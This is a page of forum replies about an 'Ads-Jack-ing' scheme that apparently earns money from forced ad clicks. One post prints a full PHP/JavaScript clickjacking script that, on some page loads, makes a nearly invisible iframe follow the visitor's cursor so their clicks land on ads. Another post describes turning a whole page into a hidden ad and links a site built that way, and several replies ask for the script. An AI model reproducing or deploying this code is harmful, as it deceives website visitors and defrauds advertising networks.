30.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

09-29-2013, 10:53 PM
Post: #51
RE:
http://error404.000webhost.com/?...

lol!
09-29-2013, 11:58 PM
Post: #52
RE:
awesome.. would you share the method? please:)
09-30-2013, 12:01 AM
Post: #53
RE:
-_- .. just share the script.
09-30-2013, 12:49 AM
Post: #54
RE:
i just cant understand this !! but anyways if anyone can tell me all about this , just pm me !! and i advice u all not to use this maybe cause u can get a ban !! try on a new account !!
09-30-2013, 01:01 PM (This post was last modified: 09-30-2013 01:04 PM by deadblue12.)
Post: #55
RE:
Im currently trying this out with Yllix.. I'm not yet sure how much yllix pays for clicks but I don't want to risk my adsense acc. I made a .tk for it ---> http://txt2sawa.tk/index.html

I made the whole page as the actual ad. if a user clicks anywhere on the page.. my ad gets clicked. ^_^

It's working fine.. thanks for sharing!! :)
88.gif
10-23-2013, 07:21 AM
Post: #56
RE:
could someone share the script
10-31-2013, 05:43 AM
Post: #57
RE:
This seems nothing more than simple iframing which is forced to click on ads.... thou thanks for the script man... :)
12-02-2013, 06:07 AM
Post: #58
RE:
how to use this i wordpress, i have tried but nothing yet.
any idea what to change or where to place she code ?


Code:
<?php session_start(); ?>
<html>
    <head>
        <title>Ads-Jack-ing</title>
<style>
iframe.sendframe {
opacity:0.1;
position:absolute;
overflow:hidden;
top:100;
left:100;
}
</style>

        <!--
Change opacity above, set to higher if you want like to 0.4 to be more visable
-->
<script>
document.onmousemove = mouseMove;
function mouseMove(ev){
ev = ev || window.event;
var mousePos = mouseCoords(ev);
document.getElementById('sendframe').style.left=mousePos.x-60;
document.getElementById('sendframe').style.top=mousePos.y-53;
}
function mouseCoords(ev){
if(ev.pageX || ev.pageY){
return {x:ev.pageX, y:ev.pageY};
}
return {
x:ev.clientX + document.body.scrollLeft - document.body.clientLeft,
y:ev.clientY + document.body.scrollTop  - document.body.clientTop
};
}
</script>

    </head>
<body>
<?
$i=mt_rand(1,3);
if($i==2){
echo "<iframe src=\"ignore-this.html\" id=\"sendframe\" class=\"sendframe\" frameborder=\"0\" scrolling=\"no\" width=\"100\" height=\"100\"></iframe>";
}
?>
<!-- iFrame to ignore-this.html, simple iframe code within a webpage will suffice" -->
</body>
</html>
12-02-2013, 07:00 AM
Post: #59
RE:
how to use this in wordpress, any one tried?
12-03-2013, 08:02 AM
Post: #60
RE:
hah, use the script and i guarantee you that your ad-sense will get flagged -> banned. Gl!
80.gif




27.gif